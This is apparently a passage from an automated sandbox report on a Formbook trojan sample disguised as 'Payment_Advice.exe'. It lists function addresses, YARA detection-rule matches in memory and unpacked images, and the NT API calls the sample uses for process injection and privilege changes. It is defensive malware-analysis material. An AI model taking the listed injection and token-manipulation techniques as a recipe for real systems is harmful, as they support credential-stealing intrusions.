          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037970C016_2_037970C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384F7B016_2_0384F7B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038416CC16_2_038416CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037D563016_2_037D5630
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0382D5B016_2_0382D5B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038595C316_2_038595C3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384757116_2_03847571
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0378146016_2_03781460
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384F43F16_2_0384F43F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03805BF016_2_03805BF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037CDBF916_2_037CDBF9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384FB7616_2_0384FB76
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037AFB8016_2_037AFB80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03831AA316_2_03831AA3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0382DAAC16_2_0382DAAC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0383DAC616_2_0383DAC6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03847A4616_2_03847A46
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384FA4916_2_0384FA49
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037D5AA016_2_037D5AA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03803A6C16_2_03803A6C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379995016_2_03799950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037AB95016_2_037AB950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0382591016_2_03825910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037FD80016_2_037FD800
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037938E016_2_037938E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384FFB116_2_0384FFB1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384FF0916_2_0384FF09
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03753FD516_2_03753FD5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03753FD216_2_03753FD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03791F9216_2_03791F92
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03799EB016_2_03799EB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03793D4016_2_03793D40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037AFDC016_2_037AFDC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03841D5A16_2_03841D5A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03847D7316_2_03847D73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384FCF216_2_0384FCF2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03809C3216_2_03809C32
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6E5BB16_2_02B6E5BB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6D56316_2_02B6D563
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6DB3B16_2_02B6DB3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6E81C16_2_02B6E81C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B59E5016_2_02B59E50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B59E4F16_2_02B59E4F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B52FB016_2_02B52FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6DF8B16_2_02B6DF8B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B52D9016_2_02B52D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B52D8816_2_02B52D88
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6DDCE16_2_02B6DDCE
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_001D1A91
          Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: dxgidebug.dllJump to behavior
          Source: Payment_Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.3875577794.00000000106B5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: ewdbwwfpdh.bmp PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmd.exe PID: 636, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_001DF122
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01727E54 appears 111 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0174EA12 appears 86 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0175F290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 016CB970 appears 280 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01715130 appears 58 times
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: String function: 0051EB78 appears 39 times
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: String function: 0051F5F0 appears 31 times
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: String function: 0051EC50 appears 56 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 037FEA12 appears 86 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 037C5130 appears 58 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0380F290 appears 105 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0377B970 appears 280 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 037D7E54 appears 111 times
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: String function: 0018FD60 appears 40 times
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: String function: 00190DC0 appears 46 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A320 NtCreateFile,14_2_0041A320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A3D0 NtReadFile,14_2_0041A3D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A450 NtClose,14_2_0041A450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A500 NtAllocateVirtualMemory,14_2_0041A500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A2DB NtCreateFile,14_2_0041A2DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A3CA NtReadFile,14_2_0041A3CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712B60 NtClose,LdrInitializeThunk,14_2_01712B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_01712BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712AD0 NtReadFile,LdrInitializeThunk,14_2_01712AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_01712D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712D10 NtMapViewOfSection,LdrInitializeThunk,14_2_01712D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_01712DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712DD0 NtDelayExecution,LdrInitializeThunk,14_2_01712DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_01712C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_01712CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712F30 NtCreateSection,LdrInitializeThunk,14_2_01712F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712FE0 NtCreateFile,LdrInitializeThunk,14_2_01712FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712FB0 NtResumeThread,LdrInitializeThunk,14_2_01712FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712F90 NtProtectVirtualMemory,LdrInitializeThunk,14_2_01712F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_01712EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_01712E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01714340 NtSetContextThread,14_2_01714340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01714650 NtSuspendThread,14_2_01714650
